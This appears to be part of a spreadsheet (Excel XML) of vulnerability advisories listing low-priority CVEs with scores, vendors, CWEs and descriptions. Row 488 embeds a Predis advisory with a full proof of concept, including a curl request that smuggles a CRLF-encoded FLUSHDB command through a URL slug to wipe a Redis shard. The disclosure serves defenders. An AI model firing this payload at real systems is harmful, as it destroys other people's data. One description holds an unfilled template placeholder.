      <c r="Q476" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78593</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>security@elastic.co</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr"/>
      <c r="Q477" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>An insufficiently validated configuration field in Kibana's Cribl integration allows an authenticated user holding Kibana Fleet management privileges to inject attacker-controlled expressions into a server-side script template, resulting in an Elasticsearch ingest pipeline being written beyond the caller's authorized Elasticsearch permissions.</t>
        </is>
      </c>
      <c r="S477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78593</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69904</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K478" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr"/>
      <c r="Q478" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76960</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr"/>
      <c r="Q479" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R479"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S479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76961</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr"/>
      <c r="Q480" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA Finance (Advanced Payment Management) does not perform sufficient Cross-Site Request Forgery protection on certain requests, due to this an attacker with low privileges could craft a malicious link or page. If an authenticated victim interacts with it, unintended actions could be triggered on the web server on their behalf. This results in a low impact on confidentiality and integrity. There is no impact on availability.</t>
        </is>
      </c>
      <c r="S480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84389</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr"/>
      <c r="Q481" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84392</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr"/>
      <c r="Q482" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>A NULL Pointer Dereference vulnerability [CWE-476] vulnerability in Fortinet FortiOS 7.4 all versions, FortiOS 7.2 all versions, FortiPAM 1.9.0, FortiPAM 1.8 all versions, FortiPAM 1.7 all versions, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.6, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions may allow an authenticated attacker to crash the httpsd daemon via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="S482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82060</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K483" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr"/>
      <c r="Q483" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>In MongoDB, insufficient validation of shard key values during document insertion allowed authenticated users to store documents with specially crafted, operator-shaped objects as shard key values in sharded collections. When change stream events for such documents were processed with the updateLookup full document mode, the crafted values were embedded into internal post-image lookup queries without proper sanitization, causing them to be interpreted as query operators rather than literal equality values. This could result in change stream consumers receiving incorrect post-image documents or encountering non-resumable fatal errors.</t>
        </is>
      </c>
      <c r="S483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58234</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr"/>
      <c r="Q484" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>SAP Process Integration (SOAP Adapter) allows a privileged user to send specially crafted requests containing deeply nested entity definitions, which under certain conditions could temporarily increase processor load and degrade system responsiveness. Successful exploitation results in low impact on availability with no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="S484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86517</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr"/>
      <c r="Q485" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. The impacted element is the function mysqli_query of the file /pages/us_searchfrm.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85643</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr"/>
      <c r="Q486" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in code-projects Online Shopping System 1.0. Impacted is the function mysqli_query of the file admin/adduser.php. Executing a manipulation of the argument mobile can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85643</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41855</t>
        </is>
      </c>
      <c r="D487" s="5" t="inlineStr"/>
      <c r="E487" s="5" t="inlineStr"/>
      <c r="F487" s="5" t="inlineStr"/>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr">
        <is>
          <t>maven:org.springframework:spring-jms</t>
        </is>
      </c>
      <c r="M487" s="5" t="inlineStr">
        <is>
          <t>6.2.19, 7.0.8</t>
        </is>
      </c>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr"/>
      <c r="P487" s="5" t="inlineStr"/>
      <c r="Q487" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>In an untrusted JMS environment, org.springframework.jms.support.converter.MappingJackson2MessageConverter and org.springframework.jms.support.converter.JacksonJsonMessageConverter allow arbitrary class instantiation, which can lead to unauthorized actions via gadget class deserialization.
Affected versions:
Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48.</t>
        </is>
      </c>
      <c r="S487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41855</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84372</t>
        </is>
      </c>
      <c r="D488" s="5" t="inlineStr"/>
      <c r="E488" s="5" t="inlineStr"/>
      <c r="F488" s="5" t="inlineStr"/>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr">
        <is>
          <t>composer:predis/predis</t>
        </is>
      </c>
      <c r="M488" s="5" t="inlineStr">
        <is>
          <t>3.3.0</t>
        </is>
      </c>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr"/>
      <c r="P488" s="5" t="inlineStr"/>
      <c r="Q488" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>### Summary
An improper CRLF neutralization flaw in Predis' pipeline handling on
aggregate connections lets an unauthenticated attacker who can influence any
pipelined argument — a value **or** a key, e.g. a URL slug used as a cache key —
smuggle arbitrary Redis commands into the connection.
- On **cluster** connections (`cluster` option, incl. client-side sharding) this
  is remote command injection: shard-wide `FLUSHDB`, targeted `DEL`/`SET`,
  same-slot key theft via `GET`, cache poisoning, and possible node/cluster
  outage.
- On **replication** connections (`replication` option) it is a reliable,
  repeatable denial of service (uncaught fatal error) triggered by any value
  containing `\r\n`.
### Details
When a pipeline is executed over an aggregate connection,
`AbstractAggregateConnection::write()` re-parses the already-serialized pipeline
buffer with `explode("\r\n")` instead of honoring RESP length prefixes:
- https://github.com/predis/predis/blob/v3.2.0/src/Connection/AbstractAggregateConnection.php#L78-L94
  - splits the buffer on `\r\n`, ignoring `$&lt;len&gt;` bulk lengths,
  - rebuilds each chunk via `Command::deserializeCommand()`
    (https://github.com/predis/predis/blob/v3.2.0/src/Command/Command.php#L157)
    to decide routing,
  - writes each chunk to the connection chosen for that (fake) command.
RESP is length-prefixed, so the Redis **server** parses the original stream
correctly — but this second, client-side parser treats attacker-controlled
`\r\n` sequences as command boundaries. An argument such as:
    PAD\r\n*1\r\n$7\r\nFLUSHDB
is a single data value to the server, but a complete, valid `FLUSHDB` command to
the re-parser. The consequence depends on the connection type:
- **Replication:** a pipeline forces `switchToMaster()`, so all chunks go to the
  master and the byte stream stays intact — but the misaligned chunk makes
  `deserializeCommand()` throw an uncaught `UnexpectedValueException: Invalid
  serializing format`. Any value containing `\r\n` (binary serializers such as
  igbinary/msgpack, or multi-line text) reliably crashes the request. This is
  the crash tracked in #1574 — an unauthenticated, repeatable DoS.
- **Cluster:** chunks are routed to different nodes by slot, so the byte stream
  is split across sockets. The smuggled command arrives on a node whose stream
  is clean and is **executed**, though the application never sent it:
  - `FLUSHDB` wipes an entire shard. It has no key but is routable because
    `ClusterStrategy::getFakeKey()` hardcodes the fake key `'key'`
    (https://github.com/predis/predis/blob/v3.2.0/src/Cluster/ClusterStrategy.php#L56
    and #L243-L246), so the smuggled command always lands on the node serving
    `slot('key')`.
  - `INFO` (same fake-key routing) leaks server configuration via orphaned
    responses; `CLUSTER FLUSHSLOTS` can take a node down.
  - Same-slot `GET`/`SET`/`DEL` allow key theft (the reply is attributed to the
    application's own later command on that slot), cache poisoning and targeted
    data destruction; junk-key floods can exhaust node memory (OOM / mass
    eviction of legitimate keys).
  - Lua execution is **not** reachable: `EVAL` cannot be reconstructed (the
    class is `EVAL_` due to the PHP reserved word), `EVAL_RO` fails the `Keys`
    trait validation, and `EVALSHA` requires a pre-loaded script. This is
    accidental, not a designed mitigation, and does not reduce severity —
    `FLUSHDB`/`DEL`/`SET` alone already permit full cache wipes and data
    destruction.
**Affected versions.** Introduced in v3.0.0 by PR #1438 ("Improved pipeline
abstractions"). Affected range: **3.0.0-RC1 through 3.2.0** (v3.0.0-alpha1 is not
affected — the vulnerable code was added after it). v1.x and v2.x are not
affected; their pipelines write per-command via `writeRequest()` and the
vulnerable code path does not exist.
Only `pipeline()` reaches the vulnerable sink; `transaction()` / `MULTI` paths do
not.
### Proof of concept
Two plain `redis:8` containers acting as two shards (PredisCluster shards
client-side, so Redis itself need not be in cluster mode); a PHP app on a
vulnerable Predis checkout (e.g. v3.2.0).
`docker-compose.yml`:
    services:
      redis1:
        image: redis:8
        ports: ["6391:6379"]
      redis2:
        image: redis:8
        ports: ["6392:6379"]
`index.php` (a normal-looking app — slug from URL → cache lookup):
    &lt;?php
    require __DIR__ . '/vendor/autoload.php';
    $nodes  = ['tcp://127.0.0.1:6391', 'tcp://127.0.0.1:6392'];
    $client = new Predis\Client($nodes, ['cluster' =&gt; 'predis',
                'parameters' =&gt; ['read_write_timeout' =&gt; 2]]);
    if (isset($_GET['seed'])) {
        for ($i = 1; $i &lt;= 100; $i++) { $client-&gt;set("user:$i", "data$i"); }
        exit('seeded');
    }
    $slug = $_GET['slug'] ?? '';
    try {
        [$doc] = $client-&gt;pipeline()-&gt;get("slug:$slug")-&gt;execute();
        echo $doc ?: 'no such slug';
    } catch (Throwable $e) {
        http_response_code(500);
        echo get_class($e);
    }
Run:
    composer require predis/predis:3.2.0
    docker compose up -d
    php -S 127.0.0.1:8080 -t .
    curl 'http://127.0.0.1:8080/?seed'                       # 100 keys
Attack (smuggled `FLUSHDB` inside the slug):
    curl 'http://127.0.0.1:8080/?slug=PAD4%0D%0A*1%0D%0A%247%0D%0AFLUSHDB'
The slug's first line must hash to a different shard than the fake key `'key'`
(otherwise the truncated bytes swallow the injection and the request simply
404s). With two shards this is ~50% per attempt — retry `PAD0`, `PAD1`, … until
the request returns 500. More shards make the attack **easier**: the per-attempt
hit probability is `(N-1)/N`, so on production clusters with many shards the
first request succeeds with near-certainty.
Verified result: `dbsize` across both shards drops 100 → 62; one shard was wiped
by a `FLUSHDB` the application never issued (it only ever ran `GET`/`SET` on
normal keys). The fix was confirmed A/B: the same PoC wipes a shard on the parent
of commit `053cb4b6` and fails on `053cb4b6`.
### Impact
CWE-93 (Improper Neutralization of CRLF Sequences) leading to Redis command
injection / protocol smuggling and denial of service. Any application on
**predis/predis 3.0.0-RC1 – 3.2.0** that calls `pipeline()` on a cluster or
replication connection and includes attacker-influenced data (values **or**
keys — e.g. cache keys built from URL slugs) in the pipelined commands is
affected. This is a common pattern for cache lookups, sessions and queued
writes.
- **Cluster:** unauthenticated remote command injection — shard-wide cache wipe
  (`FLUSHDB`), targeted destruction (`DEL`), cache poisoning (`SET`), same-slot
  key theft (`GET`), node memory exhaustion (key flood), possible cluster outage
  (`CLUSTER FLUSHSLOTS`).
- **Replication:** reliable unauthenticated DoS on every affected request.
### Remediation
Upgrade to **predis/predis 3.3.0 or later**. The fix (PR #1586, commit
`053cb4b6`) makes pipelines on aggregate connections write each command using the
real `Command` object, eliminating the second, byte-splitting parser.
Users who cannot upgrade immediately should avoid calling `pipeline()` on
aggregate (cluster / replication) connections with any attacker-influenced keys
or values; there is no reliable in-application way to neutralize the embedded
`\r\n` while the second parser remains in the code path.</t>
        </is>
      </c>
      <c r="S488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>GHSA-2q33-cf8w-7q23</t>
        </is>
      </c>
      <c r="D489" s="5" t="inlineStr"/>
      <c r="E489" s="5" t="inlineStr"/>
      <c r="F489" s="5" t="inlineStr"/>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.Native.Quic.MsQuic.OpenSSL</t>
        </is>
      </c>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr"/>
      <c r="P489" s="5" t="inlineStr"/>
      <c r="Q489" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-92f5-vc22-8j33. This link is maintained to preserve external references.
## Original Description
Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S489" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-2q33-cf8w-7q23</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S489"/>
  <conditionalFormatting sqref="E2:E48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89">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s>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
</worksheet>
</file>

